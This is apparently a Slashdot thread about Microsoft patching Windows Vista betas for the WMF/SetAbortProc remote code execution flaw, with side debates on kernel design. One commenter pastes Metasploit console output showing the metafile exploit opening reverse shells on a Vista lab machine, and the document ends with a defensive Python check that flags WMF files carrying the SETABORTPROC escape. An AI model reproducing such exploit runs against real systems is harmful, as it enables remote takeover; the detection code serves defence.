First Windows Vista Security Update Released
Bard Of Vim writes "Microsoft has issued critical security patches for beta testers running the Windows Vista December CTP (Community Technology Preview) and Windows Vista Beta 1, and warned that the new operating system was vulnerable to a remote code execution flaw in the Graphics Rendering Engine. The Vista patches address the same vulnerability that led to the WMF (Windows Metafile) malware attacks earlier this month. The recent out-of-cycle security update for the WMF vulnerability (see slashdot coverage) makes no mention of Windows Vista being vulnerable, but with the release of this weekend's patches it is clear that the poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
"poorly designed 'SetAbortProc,' the function that allows printing jobs to be canceled, was ported over to Vista."
SetAbortProc is well designed. The problem is the code that handles the WMF. That code is allowing a payload to be placed on the stack and an incorrect pointer to be sent.
All set abort proc does is send an abort code to the print job and set a call back method to call when the abort completes.
-Rick
"Most people in the U.S. wouldn't know they live in a tyrannical state if it walked up and grabbed their junk." - MyFirs
Don't people use firewalls anymore?
Firewalls don't help in this case. The flaw allows attackers to execute code of their choice on a system when the victim views a WMF file (on a website, for example).
All those who believe in telekinesis, raise my hand.
That is why this is such a dangerous vulnerability. Since this is a vulnerability in the graphics engine (metafile playback) it can be exploited through a web page that contains a malicious graphic. That will come right in through port 80 on your firewall.
IIRC, Gibson wasn't saying it was a back door that Microsoft hadn't bothered to fix. He was suggesting that it was a back door that somebody had put there on purpose.
Breakfast served all day!
It's been speculated that the WMF vulnerability was there intentionally for whatever reason, or so GRC reported: http://www.grc.com/SecurityNow.htm#22 . Now whether it was a rogue programmer or part of MS's plans for world domination, we don't know, but if it was indeed placed there intentionally, it wasn't a bug. If it's not a bug, then of course it would survive the code auditing several times over. Because of the recent discovery of it by the public, of course, MS had to fix it on all OSes, and the Vista patch was just later than the others because it wasn't as critical.
I posted something about Vista being vulnerable to the WMF thing in a Vista Kernel post here not long ago. They got a little mad at me but that is okay. Everyone has to be mad at someone!
People were telling me you can't automatically exploit it but I fired up metasploit and was successful with the admin account and a non-priv account.
Administrator
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49450, redirecting...
[*] HTTP Client connected from 10.1.1.106:49451, redirecting...
[*] HTTP Client connected from 10.1.1.106:49452, redirecting...
[*] HTTP Client connected from 10.1.1.106:49453, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49454
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\Administrator\Desktop>
Test account
msf ie_xp_pfv_metafile(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Waiting for connections to http://10.1.1.101:8080/
[*] HTTP Client connected from 10.1.1.106:49487, redirecting...
[*] HTTP Client connected from 10.1.1.106:49488, redirecting...
[*] HTTP Client connected from 10.1.1.106:49489, sending 1864 bytes of payload...
[*] Got connection from 10.1.1.101:4321 10.1.1.106:49490
Microsoft Windows [Version 6.0.5112]
(C) Copyright 1985-2005 Microsoft Corp.
E:\Users\test\Desktop>
I am wondering what else they are going to import from the old technology. I was a Windows fan up until this WMF dealio. I work in an Information Security office and all of our staff are going to Mac. Ordered them Friday!
Consumers don't want it either. They have even less money to pay for new software and hardware than businesses. They rarely upgrade any software until they have to or they get a new computer (unless the upgrade is free).
I still have more fans than freaks. WTF is wrong with you people?
Say what???
- 2005-3257 Date? 2005-10-17
- 2005-2490 (and 2492, both with sendmsg) Date? 2005-09-09
- 2005-1768 Date? 2005-07-11
Just about weekly? I beg to differ. Last local root exploit:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE
The one before:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
How about the one before?
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN
Perhaps you'd like to backup your claim?
Dozens? No. Several? Yes. Dozen? About that. How many would M$ products have if as many eyes analyzed it relentlessly? A metric assload. Take the partial 2k source code for an example.
...that Longhorn (now Vista) is a completely new design... from scratch... none of the earlier flaws would be ported to it? ...or are they full of shit as usual?
Do I remember wrong ?
Actually, .NET 2.0 runs on everything short of Win95 AFAIK. Vista isn't about .NET 2.0 whatsoever, it's about a bunch of other new technologies:
.NET 2 and that people don't care about that is uninformed at best...
WPF: Windows Presentation Framework ("avalon"; using XAML): what WinFX and the new AERO Shell are based onto;
WCF: Windows Communication Foundation ("indigo": an enhancement to Web Services, MSMQ, etc);
WWF: Windows Workflow Foundation, to help take care of scenarios like the one that was asked on "ask.slashdot.org" just yesterday. Something that's becoming increasingly common/important nowadays.
People like to just dismiss Vista like it has nothing new or worthwhile, ignoring all the new stuff that actually IS there, not just the previous 3 things mentioned, but there's a great deal of other changes (video drivers not in kernel mode anymore, new audio and printing (both work quite differently), GUI rendered by the
There are differences. It may not be worthwhile to everyone, but as a programmer I'm looking forward to many of these advances (WCF seems really nice). Saying Vista is about
Repeat after me: Mac OS X is not a microkernel. Mac OS X is not a microkernel
Mac OS X is derived from a microkernel (Mach) - but it's far from being a microkernel. A microkernel is not supposed to have the whole TCP/IP stack in kernel space. A microkernel is not supposed to implement drivers in kernel space. A microkernel is not supposed to have the filesystem in kernel space. Microkernels were, in fact, invented to get these things out of kernel space and run them in userspace, etc. Being a pure microkernel implied a performance penalty they were not willing to pay. By moving all those things to kernel space, Mac OS X broke the whole "idea" behind microkernels and stopped being a microkernel (which is not a bad thing: all the other OSes do the same).
NT was also derived from Mach BTW. I will never understand why Mac zealots spend countless hours saying how crap the NT kernel is when the fact is that they derive from the same idea. And just because they are derived from a microkernel doesn't mean the microkernel is what implements all the functionality. Mac OS X and NT copy from Mach the "design": processes implementing functionality running in userspace, the real kernel being a scheduler scheduling those processes, etc. That's the "framework"; the real functionality (TCP/IP, drivers, FS, etc) is implemented on top of that. The difference is that NT implemented that functionality looking at VMS, and Mac OS X/NeXTSTEP implemented it by using BSD code from FreeBSD. There are some exceptions I think (the Mac OS X VFS and journaling layer is implemented by Mach, I think) but the idea is that. And this is BTW the reason why Linus Torvalds just hates the Mac OS X and NT design: if you're going to do a microkernel, do it, but if you are going to put all the drivers and the TCP/IP stack in the kernel, then don't use a microkernel design base, because you're using the wrong tool and you're overengineering; just use a monolithic kernel and modularize it as much as you can (or something like that).
win2003 directly uses quite a large percent of windows xp.. and the same with vista. not a lot of the old nt 3.1 code is still around, since it was all converted from asm to C for nt4 and then continually removed/replaced. and then the new driver model in 5.0... nt5.1 directly inherits from nt5 as does nt6
They "started over" by going back to the RTM Windows Server 2003 code and porting in features from the previous attempt at longhorn selectively. That is, they reset the development of Vista - they did not write a new operating system from scratch.
Now people are making fun of Microsoft for porting this over to Vista! Do any of you know what it is? If you are a graphics designer you probably should know what it is. Look it up: graphics designers and web designers love vector graphics. This is the file that allows Windows to draw vector and bitmap images on pre-2000 systems, though it is still included for backwards compatibility.
A metafile is a list of commands that can be played back to draw a graphic. Typically, a metafile is made up of commands to draw objects such as lines, polygons and text and commands to control the style of these objects. NOTE: Some people equate metafiles with vector graphics. In most cases this is fine; but, strictly speaking, a metafile can contain any mix of vector and raster graphics. For example, a metafile could contain just one command to display a bitmap! Unless the distinction is important, we will consider a metafile to be a kind of vector graphic.
The reason it was still included is because it is technically a file format! Do you rewrite everything in Linux? Was PHP totally rewritten from the ground up from PHP 4 to PHP 5? I don't think so.
Just my take on things!
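A defender-side check that follows from Rick's point about SetAbortProc and the "list of commands played back" description of a metafile above, added here as an example rather than anything posted in the thread: walk the WMF record list and flag any META_ESCAPE record carrying the SETABORTPROC sub-code, which a still image has no legitimate reason to contain. The record constants are the WMF format's own; the sample blobs are constructed in the block.

```python
import struct

# Constants from the WMF file format; the sample files further down are constructed here.
PLACEABLE_MAGIC = 0x9AC6CDD7   # optional 22-byte "placeable" header in front of the real one
META_ESCAPE = 0x0626           # record that passes a GDI escape through to the device driver
SETABORTPROC = 0x0009          # the escape sub-code that installs the print-abort callback

def iter_wmf_records(data: bytes):
    """Yield (function, params) for each record in a WMF blob.
    Header: Type(2) HeaderSize(2, in words) Version(2) Size(4) NumObjects(2)
            MaxRecord(4) NumMembers(2) = 18 bytes. Record: Size(4, words) Function(2) Params."""
    off = 22 if len(data) >= 4 and struct.unpack_from("<I", data, 0)[0] == PLACEABLE_MAGIC else 0
    if len(data) < off + 18:
        raise ValueError("truncated WMF header")
    off += struct.unpack_from("<H", data, off + 2)[0] * 2
    while off + 6 <= len(data):
        size_words, func = struct.unpack_from("<IH", data, off)
        if size_words < 3:                  # size + function alone already take 3 words
            raise ValueError(f"bad record size at offset {off}")
        end = off + size_words * 2
        yield func, data[off + 6:end]
        if func == 0:                       # META_EOF terminates playback
            break
        off = end

def wmf_has_setabortproc(data: bytes) -> bool:
    """True if any META_ESCAPE record carries the SETABORTPROC sub-code.
    A picture has no reason to install a print-abort callback, so this is a
    high-signal check for files aimed at the flaw discussed in the thread."""
    for func, params in iter_wmf_records(data):
        if func == META_ESCAPE and len(params) >= 2:
            if struct.unpack_from("<H", params, 0)[0] == SETABORTPROC:
                return True
    return False

def build_record(func: int, params: bytes = b"") -> bytes:
    """Pack one WMF record (size in 16-bit words, then function, then params)."""
    return struct.pack("<IH", (6 + len(params)) // 2, func) + params

# Constructed sample images for the check; neither is a real file from the thread.
_HEADER = struct.pack("<HHHIHIH", 1, 9, 0x0300, 0, 0, 0, 0)
BENIGN_WMF = _HEADER + build_record(0x0102, b"\x01\x00") + build_record(0)   # META_SETBKMODE, EOF
SUSPICIOUS_WMF = (_HEADER
                  + build_record(META_ESCAPE, struct.pack("<HH", SETABORTPROC, 4) + b"\x00" * 4)
                  + build_record(0))
PLACEABLE_SUSPICIOUS_WMF = struct.pack("<I", PLACEABLE_MAGIC) + b"\x00" * 18 + SUSPICIOUS_WMF

if __name__ == "__main__":
    for name, blob in [("benign", BENIGN_WMF), ("suspicious", SUSPICIOUS_WMF)]:
        print(name, "->", "flag" if wmf_has_setabortproc(blob) else "ok")
```

A malformed record size raises instead of being skipped, since a parser that silently resynchronises is exactly what a crafted file relies on.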